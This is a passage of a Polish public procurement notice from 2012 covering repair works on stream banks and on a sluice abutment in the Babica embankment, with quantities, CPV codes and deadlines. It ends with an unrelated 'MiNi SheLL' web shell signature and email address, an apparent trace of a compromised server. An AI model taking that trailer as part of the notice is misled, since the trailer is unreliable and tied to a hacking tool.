skarpie - 40mb. Hakowanie przy zarośnięciu powierzchni lustra wody do 60% - 1 928m2. Ręczne usunięcie z przerzutem, warstwy ziemi urodzajnej z darnią grubości do 15cm, z rozplantowaniem na skarpach potoku obustronnie - 1 140m2. Udrożnienie dna cieku  wykonywane na odkład koparką  na odcinku w km 1+850-2+070 (220m)-poprawa obsuniętej skarpy z formowaniem - 550m3.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.31.11.00-2.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 28.09.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Wał Babicy prawy w km 0+650 - naprawa przyczółka śluzy.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Ręczne wykoszenie porostów gęstych twardych ze skarp i korony wału  wraz z wygrabieniem - 225m2. Usunięcie z przerzutem, warstwy ziemi urodzajnej z humusem  ze skarp wału grubości do 15cm - 15m2. Wykopy oraz przekopy w gruncie kategorii III wykonywane na odkład  koparką, wału - odkrycie rur na długości 2,0m - 18,75m3. Demontaż skorodowanej uszkodzonej klapy zwrotnej wraz z warsztatowym wykonaniem nowej kompletnej klapy typu wieszarowego o wymiarach 55*55*0,5 cm oraz uchwytów wraz z zamontowaniem - 1szt. Naprawa starego zniszczonego przyczółka żelbetowego o grubości do 20cm z wykonaniem nowego przyczółka - 0,78m3. Naprawa ręczna rur o średnicy 0,4m, ponowne ułożenie rur żelbetowych na wykonanym uprzednio naprawionym fundamencie, zabezpieczenie styków papą na lepiku, wykonanie opaski z betonu - 2m. Dokop ręczny pod przewód rurowy  oraz dokop ręczny pod przyczółek i płytę wypadową przyczółka ze  złożeniem urobku na odkład - 2,54m3. Wykonanie podsypek ze żwiru lub pospółki pod ławę fundamentową oraz pod płytę wypadową przyczółka (łącznie grubość 15cm) - 3,72m2. Wykonanie podłoża betonowe pod rurociąg grubości 10cm na długości 2m - 0,24m3. Zbrojenie konstrukcji przyczółka prętami o średnicy do 8mm - 16kg. Ręczny zasyp za ścianami naprawianej budowli oraz rurociągu z ubiciem warstwami 20cm ubijakami ręcznymi - 1,5m3. Formowanie i zagęszczanie spycharkami nasypów - 18,75m3. Plantowanie korony i skarp nasypu wał, humusowanie skarp warstwą grubości 10cm z obsianiem - 15m2. Transport lądowy z załadunkiem i wyładunkiem ręcznym gruzu  ciągnikiem kołowym z przyczepą na odległość  1km - 2t. Grodze ziemne o wysokości do 1,5m, stopy skarp umocnione darniną na płask - 7,5m3. Odwodnienie wykopu przy użyciu pomp godzin 16..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.34.00.00-3.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 28.09.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com